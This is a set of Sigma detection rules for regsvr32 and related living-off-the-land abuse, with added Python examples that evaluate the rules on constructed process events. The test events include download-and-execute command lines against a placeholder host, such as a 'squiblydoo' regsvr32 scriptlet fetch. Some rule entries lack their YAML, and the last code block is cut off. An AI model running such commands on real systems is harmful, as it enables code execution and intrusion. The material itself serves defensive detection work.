Sigma is an open, generic signature format for SIEM systems; each rule below can be converted to the native query syntax of Splunk, Elastic, Microsoft Sentinel and other SIEMs. The raw YAML of each rule follows its summary.
Regsvr32 Execution From Highly Suspicious Location
Detects execution of regsvr32 where the DLL is located in a highly suspicious location
status: test | author: Nasreddine Bencherchali (Nextron Systems) | id: 327ff235-94eb-4f06-b9de-aaee571324be
title: Regsvr32 Execution From Highly Suspicious Location
id: 327ff235-94eb-4f06-b9de-aaee571324be
status: test
description: Detects execution of regsvr32 where the DLL is located in a highly suspicious location
references:
    - Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-26
tags:
    - attack.stealth
    - attack.t1218.010
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\regsvr32.exe'
        - OriginalFileName: 'REGSVR32.EXE'
    selection_path_1:
        CommandLine|contains:
            - ':\PerfLogs\'
            - ':\Temp\'
            - '\Windows\Registration\CRMLog'
            - '\Windows\System32\com\dmp\'
            - '\Windows\System32\FxsTmp\'
            - '\Windows\System32\Microsoft\Crypto\RSA\MachineKeys\'
            - '\Windows\System32\spool\drivers\color\'
            - '\Windows\System32\spool\PRINTERS\'
            - '\Windows\System32\spool\SERVERS\'
            - '\Windows\System32\Tasks_Migrated\'
            - '\Windows\System32\Tasks\Microsoft\Windows\SyncCenter\'
            - '\Windows\SysWOW64\com\dmp\'
            - '\Windows\SysWOW64\FxsTmp\'
            - '\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System\'
            - '\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter\'
            - '\Windows\Tasks\'
            - '\Windows\Tracing\'
    selection_path_2:
        CommandLine|contains:
            # The leading space avoids collisions with a command line that itself starts with "C:\"
            - ' "C:\'
            - ' C:\'
            - " 'C:\\"
            - 'D:\'
    selection_exclude_known_dirs:
        CommandLine|contains:
            # Note: add additional locations that are related to third party applications
            - 'C:\Program Files (x86)\'
            - 'C:\Program Files\'
            - 'C:\ProgramData\'
            - 'C:\Users\'
            # Note: the leading spaces avoid collisions with the full path of the "regsvr32" binary itself
            - ' C:\Windows\'
            - ' "C:\Windows\'
            - " 'C:\\Windows\\"
    filter_main_empty:
        CommandLine: ''
    filter_main_null:
        CommandLine: null
    condition: selection_img and (selection_path_1 or (selection_path_2 and not selection_exclude_known_dirs)) and not 1 of filter_main_*
falsepositives:
    - Unlikely
level: high
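The condition of the rule above, evaluated in plain Python over a handful of constructed process_creation events. This is an added example, not part of the rule set or of the Sigma project; the events, paths and file names are invented for the demonstration. It shows the two things a reader should take from the rule: a list of values under one field is an OR, matching is case-insensitive, and the leading space in ' C:\' and ' C:\Windows\' is what stops the patterns from matching the regsvr32 binary's own path at the start of the command line.

```python
# Added example (not part of the rule set above): the condition of
# "Regsvr32 Execution From Highly Suspicious Location" evaluated in plain Python
# over constructed process_creation events. Sigma string matching is
# case-insensitive, so every comparison below lowercases both sides.

SUSPICIOUS_DIRS = [  # selection_path_1
    ':\\PerfLogs\\', ':\\Temp\\', '\\Windows\\Registration\\CRMLog',
    '\\Windows\\System32\\com\\dmp\\', '\\Windows\\System32\\FxsTmp\\',
    '\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\',
    '\\Windows\\System32\\spool\\drivers\\color\\',
    '\\Windows\\System32\\spool\\PRINTERS\\', '\\Windows\\System32\\spool\\SERVERS\\',
    '\\Windows\\System32\\Tasks_Migrated\\',
    '\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\',
    '\\Windows\\SysWOW64\\com\\dmp\\', '\\Windows\\SysWOW64\\FxsTmp\\',
    '\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\',
    '\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\',
    '\\Windows\\Tasks\\', '\\Windows\\Tracing\\',
]
# selection_path_2: any local absolute path passed as an *argument*. The leading
# space (or space plus quote) keeps the pattern from matching the regsvr32
# binary's own path, which is the first token of CommandLine and has nothing before it.
ANY_LOCAL_PATH = [' "C:\\', ' C:\\', " 'C:\\", 'D:\\']
# selection_exclude_known_dirs: directories DLLs are legitimately registered from;
# the same leading-space trick for C:\Windows\.
KNOWN_DIRS = [
    'C:\\Program Files (x86)\\', 'C:\\Program Files\\', 'C:\\ProgramData\\', 'C:\\Users\\',
    ' C:\\Windows\\', ' "C:\\Windows\\', " 'C:\\Windows\\",
]


def contains_any(value, needles):
    """Sigma `contains` over a list of values: OR, case-insensitive."""
    v = (value or '').lower()
    return any(n.lower() in v for n in needles)


def is_regsvr32(ev):
    """selection_img: a list of maps is OR in Sigma, so a renamed binary still matches on OriginalFileName."""
    image = (ev.get('Image') or '').lower()
    orig = (ev.get('OriginalFileName') or '').lower()
    return image.endswith('\\regsvr32.exe') or orig == 'regsvr32.exe'


def matches(ev):
    """selection_img and (path_1 or (path_2 and not known_dirs)) and not 1 of filter_main_*"""
    cmd = ev.get('CommandLine')
    if cmd is None or cmd == '':          # filter_main_null / filter_main_empty
        return False
    if not is_regsvr32(ev):
        return False
    if contains_any(cmd, SUSPICIOUS_DIRS):
        return True
    return contains_any(cmd, ANY_LOCAL_PATH) and not contains_any(cmd, KNOWN_DIRS)


# Constructed events; paths and file names are invented for the demonstration.
REGSVR = {'Image': 'C:\\Windows\\System32\\regsvr32.exe', 'OriginalFileName': 'REGSVR32.EXE'}
EVENTS = [
    # 1: DLL staged in a world-writable system directory -> selection_path_1
    dict(REGSVR, CommandLine='regsvr32.exe /s C:\\Windows\\Tasks\\update.dll'),
    # 2: DLL under a user profile: path_2 matches but the known-dirs exclusion wins
    dict(REGSVR, CommandLine='"C:\\Windows\\System32\\regsvr32.exe" /s "C:\\Users\\bob\\AppData\\Local\\Temp\\a.dll"'),
    # 3: DLL in a custom root directory -> path_2 with no exclusion
    dict(REGSVR, CommandLine='C:\\Windows\\System32\\regsvr32.exe /s C:\\Deploy\\agent.dll'),
    # 4: re-registering a system DLL: ' C:\Windows\' matches the argument, not the binary path
    dict(REGSVR, CommandLine='C:\\Windows\\System32\\regsvr32.exe /s C:\\Windows\\System32\\vbscript.dll'),
    # 5: no arguments (or a source that drops CommandLine) -> filtered out
    dict(REGSVR, CommandLine=''),
    # 6: renamed copy of regsvr32, still identified through OriginalFileName
    {'Image': 'C:\\Temp\\svc.exe', 'OriginalFileName': 'REGSVR32.EXE',
     'CommandLine': 'svc.exe /s C:\\Temp\\payload.dll'},
]


def alerts(events=EVENTS):
    """1-based indices of the events that would raise this rule."""
    return [i for i, ev in enumerate(events, 1) if matches(ev)]


if __name__ == '__main__':
    print('alerting events:', alerts())   # [1, 3, 6]
```

Event 2 is the one worth studying: ':\Temp\' does not match 'AppData\Local\Temp\' because the pattern anchors on the drive root, and the user-profile exclusion then removes the generic path hit; it is caught by neither branch, by design.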
Suspicious HH.EXE Execution
Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
status: test | author: Maxim Pavlunin | id: e8a95b5e-c891-46e2-b33a-93937d3abc31
Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)
status: test | author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io | id: 438025f9-5856-4663-83f7-52f878a70a50
Detects REGSVR32.exe executing a DLL hosted on a remote share
status: test | author: Nasreddine Bencherchali (Nextron Systems) | id: 88a87a10-384b-4ad7-8871-2f9bf9259ce5
title: Suspicious Regsvr32 Execution From Remote Share
id: 88a87a10-384b-4ad7-8871-2f9bf9259ce5
status: test
description: Detects REGSVR32.exe executing a DLL hosted on a remote share
references:
    - https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-31
tags:
    - attack.stealth
    - attack.t1218.010
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\regsvr32.exe'
        # OriginalFileName holds only the file name, so a leading backslash here would never match
        - OriginalFileName: 'REGSVR32.EXE'
    selection_cli:
        # Sigma unescapes '\\\\' to two literal backslashes: a space followed by the start of a UNC path
        CommandLine|contains: ' \\\\'
    condition: all of selection_*
falsepositives:
    - Unknown
# Decrease to medium if this is something common in your org
level: high
Suspicious WMIC Execution Via Office Process
An Office application called wmic to proxy execution through a LOLBIN process. This is often used to break the suspicious parent-child chain (Office app spawns LOLBin).
status: test | author: Vadim Khrykov, Cyb3rEng | id: e1693bc8-7168-4eab-8718-cdcaa68a1738
title: Suspicious WMIC Execution Via Office Process
id: e1693bc8-7168-4eab-8718-cdcaa68a1738
related:
    - id: 438025f9-5856-4663-83f7-52f878a70a50
      type: derived
    - id: 518643ba-7d9c-4fa5-9f37-baed36059f6a
      type: obsolete
    - id: 9d1c72f5-43f0-4da5-9320-648cf2099dd0
      type: obsolete
    - id: c0e1c3d5-4381-4f18-8145-2583f06a1fe5
      type: obsolete
    - id: 04f5363a-6bca-42ff-be70-0d28bf629ead
      type: obsolete
status: test
description: An Office application called wmic to proxy execution through a LOLBIN process. This is often used to break the suspicious parent-child chain (Office app spawns LOLBin).
references:
    - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/
    - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml
author: Vadim Khrykov, Cyb3rEng
date: 2021-08-23
modified: 2023-02-14
tags:
    - attack.stealth
    - attack.t1204.002
    - attack.t1047
    - attack.t1218.010
    - attack.execution
logsource:
    product: windows
    category: process_creation
detection:
    selection_parent:
        ParentImage|endswith:
            - '\WINWORD.EXE'
            - '\EXCEL.EXE'
            - '\POWERPNT.exe'
            - '\MSPUB.exe'
            - '\VISIO.exe'
            - '\MSACCESS.EXE'
            - '\EQNEDT32.EXE'
            - '\ONENOTE.EXE'
            - '\wordpad.exe'
            - '\wordview.exe'
    selection_wmic_img:
        - Image|endswith: '\wbem\WMIC.exe'
        - OriginalFileName: 'wmic.exe'
    selection_wmic_cli:
        CommandLine|contains|all:
            - 'process'
            - 'create'
            - 'call'
        CommandLine|contains:
            # Add more suspicious LOLBINs as you see fit
            - 'regsvr32'
            - 'rundll32'
            - 'msiexec'
            - 'mshta'
            - 'verclsid'
            - 'wscript'
            - 'cscript'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high
Suspicious WmiPrvSE Child Process
Detects suspicious and uncommon child processes of WmiPrvSE
status: test | author: Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems) | id: 8a582fe2-0882-4b89-a82a-da6b2dc32937
title: Suspicious WmiPrvSE Child Process
id: 8a582fe2-0882-4b89-a82a-da6b2dc32937
related:
    - id: 692f0bec-83ba-4d04-af7e-e884a96059b6
      type: similar
    - id: d21374ff-f574-44a7-9998-4a8c8bf33d7d
      type: similar
    - id: 18cf6cf0-39b0-4c22-9593-e244bdc9a2d4
      type: obsolete
status: test
description: Detects suspicious and uncommon child processes of WmiPrvSE
references:
    - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/
    - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml
    - https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/
    - https://twitter.com/ForensicITGuy/status/1334734244120309760
author: Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)
date: 2021-08-23
modified: 2023-11-10
tags:
    - attack.execution
    - attack.stealth
    - attack.t1047
    - attack.t1204.002
    - attack.t1218.010
logsource:
    product: windows
    category: process_creation
detection:
    selection_parent:
        ParentImage|endswith: '\wbem\WmiPrvSE.exe'
    selection_children_1:
        # TODO: Add more LOLBINs or suspicious processes that make sense in your environment
        Image|endswith:
            - '\certutil.exe'
            - '\cscript.exe'
            - '\mshta.exe'
            - '\msiexec.exe'
            - '\regsvr32.exe'
            - '\rundll32.exe'
            - '\verclsid.exe'
            - '\wscript.exe'
    selection_children_2:
        # This is in a separate selection due to the nature of the FPs generated with CMD
        Image|endswith: '\cmd.exe'
        CommandLine|contains:
            - 'cscript'
            - 'mshta'
            - 'powershell'
            - 'pwsh'
            - 'regsvr32'
            - 'rundll32'
            - 'wscript'
    filter_main_werfault:
        Image|endswith: '\WerFault.exe'
    filter_main_wmiprvse:
        Image|endswith: '\WmiPrvSE.exe' # In some legitimate cases WmiPrvSE was seen spawning itself
    filter_main_msiexec:
        Image|endswith: '\msiexec.exe'
        CommandLine|contains: '/i '
    condition: selection_parent and 1 of selection_children_* and not 1 of filter_main_*
falsepositives:
    - Unknown
level: high
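Why the two rules above work as a pair, shown on a constructed four-event process chain. This is an added example, not code from the rule set or the Sigma project; the events are invented and the URL host is a placeholder. When an Office macro runs `wmic process call create "regsvr32 ..."`, the regsvr32 process is created by the WMI provider host, so its parent is WmiPrvSE.exe rather than WINWORD.EXE and the intuitive "Office spawns regsvr32" rule sees nothing; the WMIC rule catches the first hop and the WmiPrvSE rule the second.

```python
# Added example (not part of the rule set): the Office->WMIC rule and the
# WmiPrvSE-child rule implemented directly and run over a constructed chain.
# Sigma matching is case-insensitive, so all fields are lowercased.

OFFICE_PARENTS = ('\\winword.exe', '\\excel.exe', '\\powerpnt.exe', '\\mspub.exe',
                  '\\visio.exe', '\\msaccess.exe', '\\eqnedt32.exe', '\\onenote.exe',
                  '\\wordpad.exe', '\\wordview.exe')
WMIC_LOLBINS = ('regsvr32', 'rundll32', 'msiexec', 'mshta', 'verclsid', 'wscript', 'cscript')
WMIPRVSE_CHILDREN = ('\\certutil.exe', '\\cscript.exe', '\\mshta.exe', '\\msiexec.exe',
                     '\\regsvr32.exe', '\\rundll32.exe', '\\verclsid.exe', '\\wscript.exe')
CMD_KEYWORDS = ('cscript', 'mshta', 'powershell', 'pwsh', 'regsvr32', 'rundll32', 'wscript')


def field(ev, key):
    """Lower-cased field value, '' when absent."""
    return (ev.get(key) or '').lower()


def naive_office_spawns_regsvr32(ev):
    """The intuitive rule that the WMIC indirection defeats."""
    return field(ev, 'ParentImage').endswith(OFFICE_PARENTS) and field(ev, 'Image').endswith('\\regsvr32.exe')


def susp_wmic_via_office(ev):
    """Suspicious WMIC Execution Via Office Process: all of selection_*."""
    cmd = field(ev, 'CommandLine')
    return (field(ev, 'ParentImage').endswith(OFFICE_PARENTS)
            and (field(ev, 'Image').endswith('\\wbem\\wmic.exe') or field(ev, 'OriginalFileName') == 'wmic.exe')
            and all(w in cmd for w in ('process', 'create', 'call'))   # contains|all
            and any(b in cmd for b in WMIC_LOLBINS))                    # contains (OR)


def susp_wmiprvse_child(ev):
    """Suspicious WmiPrvSE Child Process: selection_parent and 1 of selection_children_* and not 1 of filter_main_*."""
    if not field(ev, 'ParentImage').endswith('\\wbem\\wmiprvse.exe'):
        return False
    image, cmd = field(ev, 'Image'), field(ev, 'CommandLine')
    if image.endswith(('\\werfault.exe', '\\wmiprvse.exe')):   # crash handler, provider host respawn
        return False
    if image.endswith('\\msiexec.exe') and '/i ' in cmd:       # ordinary package installs via WMI
        return False
    if image.endswith(WMIPRVSE_CHILDREN):                       # selection_children_1
        return True
    return image.endswith('\\cmd.exe') and any(k in cmd for k in CMD_KEYWORDS)  # selection_children_2


# Constructed chain; example.invalid is a placeholder host.
CHAIN = [
    # 1: macro in Word launches WMIC
    {'ParentImage': 'C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE',
     'Image': 'C:\\Windows\\System32\\wbem\\WMIC.exe', 'OriginalFileName': 'wmic.exe',
     'CommandLine': 'wmic process call create "regsvr32 /s /n /u /i:http://example.invalid/a.sct scrobj.dll"'},
    # 2: WMI creates the requested process; its parent is WmiPrvSE, not WINWORD
    {'ParentImage': 'C:\\Windows\\System32\\wbem\\WmiPrvSE.exe',
     'Image': 'C:\\Windows\\System32\\regsvr32.exe', 'OriginalFileName': 'REGSVR32.EXE',
     'CommandLine': 'regsvr32 /s /n /u /i:http://example.invalid/a.sct scrobj.dll'},
    # 3: benign software deployment through WMI, removed by filter_main_msiexec
    {'ParentImage': 'C:\\Windows\\System32\\wbem\\WmiPrvSE.exe',
     'Image': 'C:\\Windows\\System32\\msiexec.exe', 'OriginalFileName': 'msiexec.exe',
     'CommandLine': 'msiexec.exe /i C:\\Deploy\\agent.msi /qn'},
    # 4: cmd.exe under WmiPrvSE wrapping a script host -> selection_children_2
    {'ParentImage': 'C:\\Windows\\System32\\wbem\\WmiPrvSE.exe',
     'Image': 'C:\\Windows\\System32\\cmd.exe', 'OriginalFileName': 'Cmd.Exe',
     'CommandLine': 'cmd.exe /c wscript.exe C:\\Users\\Public\\run.vbs'},
]


def evaluate(events=CHAIN):
    """rule name -> 1-based indices of the events it fires on."""
    rules = {'naive_office_regsvr32': naive_office_spawns_regsvr32,
             'wmic_via_office': susp_wmic_via_office,
             'wmiprvse_child': susp_wmiprvse_child}
    return {name: [i for i, ev in enumerate(events, 1) if fn(ev)] for name, fn in rules.items()}


if __name__ == '__main__':
    for name, hits in evaluate().items():
        print(f'{name:24s} -> {hits}')
```

Correlating the two hits in a SIEM (same host, seconds apart, the LOLBin named in the WMIC command line reappearing as the WmiPrvSE child) is what turns two medium-confidence signals into the full chain.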
DNS Query Request By Regsvr32.EXE
Detects DNS queries initiated by "Regsvr32.exe"
status: test | author: Dmitriy Lifanov, oscd.community | id: 36e037c4-c228-4866-b6a3-48eb292b9955
title: DNS Query Request By Regsvr32.EXE
id: 36e037c4-c228-4866-b6a3-48eb292b9955
related:
    - id: c7e91a02-d771-4a6d-a700-42587e0b1095
      type: derived
status: test
description: Detects DNS queries initiated by "Regsvr32.exe"
references:
    - https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
    - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
author: Dmitriy Lifanov, oscd.community
date: 2019-10-25
modified: 2023-09-18
tags:
    - attack.execution
    - attack.stealth
    - attack.t1559.001
    - attack.t1218.010
logsource:
    category: dns_query
    product: windows
detection:
    selection:
        Image|endswith: '\regsvr32.exe'
    condition: selection
falsepositives:
    - Unknown
level: medium
Network Connection Initiated By Regsvr32.EXE
Detects a network connection initiated by "Regsvr32.exe"
status: test | author: Dmitriy Lifanov, oscd.community | id: c7e91a02-d771-4a6d-a700-42587e0b1095
title: Network Connection Initiated By Regsvr32.EXE
id: c7e91a02-d771-4a6d-a700-42587e0b1095
status: test
description: Detects a network connection initiated by "Regsvr32.exe"
references:
    - https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
    - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
author: Dmitriy Lifanov, oscd.community
date: 2019-10-25
modified: 2023-09-18
tags:
    - attack.execution
    - attack.stealth
    - attack.t1559.001
    - attack.t1218.010
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Initiated: 'true'
        Image|endswith: '\regsvr32.exe'
    condition: selection
falsepositives:
    - Unknown
level: medium
Potential Regsvr32 Commandline Flag Anomaly
Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without "/n", which should be uncommon.
status: test | author: Florian Roth (Nextron Systems) | id: b236190c-1c61-41e9-84b3-3fe03f6d76b0
title: Potential Regsvr32 Commandline Flag Anomaly
id: b236190c-1c61-41e9-84b3-3fe03f6d76b0
status: test
description: Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without "/n", which should be uncommon.
references:
    - https://twitter.com/sbousseaden/status/1282441816986484737?s=12
author: Florian Roth (Nextron Systems)
date: 2019-07-13
modified: 2024-03-13
tags:
    - attack.stealth
    - attack.t1218.010
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\regsvr32.exe'
        CommandLine|contains|windash: ' -i:'
    filter_main_flag:
        CommandLine|contains|windash: ' -n '
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Administrator typo might cause some false positives
level: medium
Potentially Suspicious Regsvr32 HTTP/FTP Pattern
Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.
status: test | author: Florian Roth (Nextron Systems) | id: 867356ee-9352-41c9-a8f2-1be690d78216
title: Potentially Suspicious Regsvr32 HTTP/FTP Pattern
id: 867356ee-9352-41c9-a8f2-1be690d78216
related:
    - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d
      type: obsolete
status: test
description: Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.
references:
    - https://twitter.com/mrd0x/status/1461041276514623491
    - https://twitter.com/tccontre18/status/1480950986650832903
    - https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/
author: Florian Roth (Nextron Systems)
date: 2023-05-24
modified: 2023-05-26
tags:
    - attack.stealth
    - attack.t1218.010
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\regsvr32.exe'
        - OriginalFileName: 'REGSVR32.EXE'
    selection_flag:
        CommandLine|contains:
            - ' /i'
            - ' -i'
    selection_protocol:
        CommandLine|contains:
            - 'ftp'
            - 'http'
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium
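The `windash` modifier used by the flag-anomaly rule, and the hand-written ' /i' / ' -i' pair of the HTTP/FTP rule directly above, applied to a few constructed regsvr32 command lines. This is an added example, not code from the rule set or the Sigma project; the command lines are invented and the hosts are placeholders. The dash alternatives follow the Sigma v2 specification's list (dash, slash, en dash, em dash, horizontal bar). The regsvr32 semantics behind the anomaly rule: /n suppresses the DllRegisterServer call and is normally paired with /i:, so a DllInstall call without /n is the oddity the rule looks for.

```python
# Added example (not part of the rule set): Sigma `windash` expansion plus the
# two flag-based regsvr32 rules, evaluated over constructed command lines.
import itertools

# Dash alternatives per the Sigma v2 specification: dash, slash, en dash, em dash, horizontal bar.
DASHES = ('-', '/', '\u2013', '\u2014', '\u2015')


def windash_variants(pattern):
    """Every permutation of `pattern` with each '-' replaced by one member of DASHES."""
    slots = [DASHES if ch == '-' else (ch,) for ch in pattern]
    return {''.join(p) for p in itertools.product(*slots)}


def contains_windash(value, pattern):
    """CommandLine|contains|windash: 'pattern' (case-insensitive, any variant matches)."""
    v = value.lower()
    return any(variant.lower() in v for variant in windash_variants(pattern))


def flag_anomaly(cmd):
    """Potential Regsvr32 Commandline Flag Anomaly: ' -i:' present, ' -n ' absent."""
    return contains_windash(cmd, ' -i:') and not contains_windash(cmd, ' -n ')


def http_ftp_pattern(cmd):
    """Potentially Suspicious Regsvr32 HTTP/FTP Pattern: all of selection_* (image check omitted here)."""
    c = cmd.lower()
    return any(f in c for f in (' /i', ' -i')) and any(p in c for p in ('ftp', 'http'))


# Constructed samples; example.invalid is a placeholder host.
SAMPLES = {
    'squiblydoo_classic': 'regsvr32 /s /n /u /i:http://example.invalid/file.sct scrobj.dll',
    'missing_n_flag':     'regsvr32 /s /u /i:http://example.invalid/file.sct scrobj.dll',
    'dash_style':         'regsvr32 -s -u -i:ftp://example.invalid/file.sct scrobj.dll',
    'local_dllinstall':   'regsvr32 /n /i:"C:\\Program Files\\Vendor\\setup.dll"',
    'plain_register':     'regsvr32 /s C:\\Windows\\System32\\vbscript.dll',
}


def evaluate(samples=SAMPLES):
    """sample name -> (flag_anomaly fired, http_ftp_pattern fired)."""
    return {name: (flag_anomaly(c), http_ftp_pattern(c)) for name, c in samples.items()}


if __name__ == '__main__':
    for name, (anomaly, remote) in evaluate().items():
        print(f'{name:20s} anomaly={anomaly!s:5s} http_ftp={remote}')
```

The classic squiblydoo line is deliberately not an anomaly (it carries /n) and is left to the HTTP/FTP rule; the two rules overlap on the dash-style and missing-/n lines, which is why both are worth running side by side.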
Regsvr32 Execution From Potential Suspicious Location
Detects execution of regsvr32 where the DLL is located in a potentially suspicious location.
Scripting/CommandLine Process Spawned Regsvr32
Detects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance.
status: test | author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | id: ab37a6ec-6068-432b-a64e-2c7bf95b1d22
title: Scripting/CommandLine Process Spawned Regsvr32
id: ab37a6ec-6068-432b-a64e-2c7bf95b1d22
related:
    - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d
      type: obsolete
status: test
description: Detects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance.
references:
    - https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html
    - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-26
tags:
    - attack.stealth
    - attack.t1218.010
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith:
            - '\cmd.exe'
            - '\cscript.exe'
            - '\mshta.exe'
            - '\powershell_ise.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\wscript.exe'
        Image|endswith: '\regsvr32.exe'
    filter_main_rpcproxy:
        ParentImage: C:\Windows\System32\cmd.exe
        CommandLine|endswith: ' /s C:\Windows\System32\RpcProxy\RpcProxy.dll'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Legitimate ".bat", ".hta", ".ps1" or ".vbs" scripts often invoke regsvr32 legitimately. Apply additional filters and exclusions as necessary
    - Some legitimate Windows services
level: medium # Can be reduced to low if you experience a ton of FP
Unsigned DLL Loaded by Windows Utility
Detects Windows utilities loading an unsigned or untrusted DLL. Adversaries often abuse those programs to proxy execution of malicious code.
status: test | author: Swachchhanda Shrawan Poudel | id: b5de0c9a-6f19-43e0-af4e-55ad01f550af
title: Unsigned DLL Loaded by Windows Utility
id: b5de0c9a-6f19-43e0-af4e-55ad01f550af
status: test
description: |
    Detects Windows utilities loading an unsigned or untrusted DLL.
    Adversaries often abuse those programs to proxy execution of malicious code.
references:
    - https://www.elastic.co/security-labs/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion
    - https://akhere.hashnode.dev/hunting-unsigned-dlls-using-kql
    - https://unit42.paloaltonetworks.com/unsigned-dlls/?web_view=true
author: Swachchhanda Shrawan Poudel
date: 2024-02-28
modified: 2025-10-07
tags:
    - attack.stealth
    - attack.t1218.011
    - attack.t1218.010
logsource:
    product: windows
    category: image_load
detection:
    selection:
        Image|endswith:
            # Note: Add additional utilities that allow the loading of DLLs
            - '\InstallUtil.exe'
            - '\RegAsm.exe'
            - '\RegSvcs.exe'
            - '\regsvr32.exe'
            - '\rundll32.exe'
    filter_main_signed:
        Signed: 'true'
    filter_main_sig_status:
        SignatureStatus:
            - 'errorChaining'
            - 'errorCode_endpoint'
            - 'errorExpired'
            - 'trusted'
            - 'Valid'
    filter_main_signed_null:
        Signed: null
    filter_main_signed_empty:
        Signed:
            - ''
            - '-'
    filter_main_sig_status_null:
        SignatureStatus: null
    filter_main_sig_status_empty:
        SignatureStatus:
            - ''
            - '-'
    filter_main_windows_installer:
        Image:
            - 'C:\Windows\SysWOW64\rundll32.exe'
            - 'C:\Windows\System32\rundll32.exe'
        ImageLoaded|startswith: 'C:\Windows\Installer\'
        ImageLoaded|endswith:
            - '.tmp-\Microsoft.Deployment.WindowsInstaller.dll'
            - '.tmp-\Avira.OE.Setup.CustomActions.dll'
    filter_main_assembly:
        Image|startswith:
            - 'C:\Windows\SysWOW64\'
            - 'C:\Windows\System32\'
            - 'C:\Windows\Microsoft.NET\Framework64'
        Image|endswith: '\RegAsm.exe'
        ImageLoaded|endswith: '.dll'
        ImageLoaded|startswith: 'C:\Windows\assembly\NativeImages'
    filter_optional_klite_codec:
        Image:
            - 'C:\Windows\SysWOW64\regsvr32.exe'
            - 'C:\Windows\System32\regsvr32.exe'
        ImageLoaded|startswith:
            - 'C:\Program Files (x86)\K-Lite Codec Pack\'
            - 'C:\Program Files\K-Lite Codec Pack\'
    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - Unknown
level: medium
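The signature-state handling of the rule above, run over constructed image_load events. This is an added example, not code from the rule set or the Sigma project; the events, DLL names and paths are invented (Sysmon-style `Signed`/`SignatureStatus` values are assumed). The rule is written as `selection and not 1 of filter_main_*`, so an event whose source never populates `Signed` or `SignatureStatus` would pass every `not` clause and the rule would fire on every DLL load by these utilities; the `_null` and `_empty` filters exist to stop that, and the `strict` switch below shows the difference.

```python
# Added example (not part of the rule set): "Unsigned DLL Loaded by Windows Utility"
# evaluated over constructed image_load events, with the null/empty filters
# switchable to show why they are in the rule.

UTILITIES = ('\\installutil.exe', '\\regasm.exe', '\\regsvcs.exe', '\\regsvr32.exe', '\\rundll32.exe')
TRUSTED_STATUS = ('errorchaining', 'errorcode_endpoint', 'errorexpired', 'trusted', 'valid')
ABSENT = (None, '', '-')          # filter_main_*_null / filter_main_*_empty
RUNDLL32 = ('c:\\windows\\syswow64\\rundll32.exe', 'c:\\windows\\system32\\rundll32.exe')
REGSVR32 = ('c:\\windows\\syswow64\\regsvr32.exe', 'c:\\windows\\system32\\regsvr32.exe')


def field(ev, key):
    """Lower-cased string field, '' when absent or not a string (Sigma matching is case-insensitive)."""
    v = ev.get(key)
    return v.lower() if isinstance(v, str) else ''


def unsigned_dll_loaded(ev, strict=True):
    """selection and not 1 of filter_main_* and not 1 of filter_optional_*.
    strict=False drops the null/empty filters to show the flood they prevent."""
    image, loaded = field(ev, 'Image'), field(ev, 'ImageLoaded')
    if not image.endswith(UTILITIES):                          # selection
        return False
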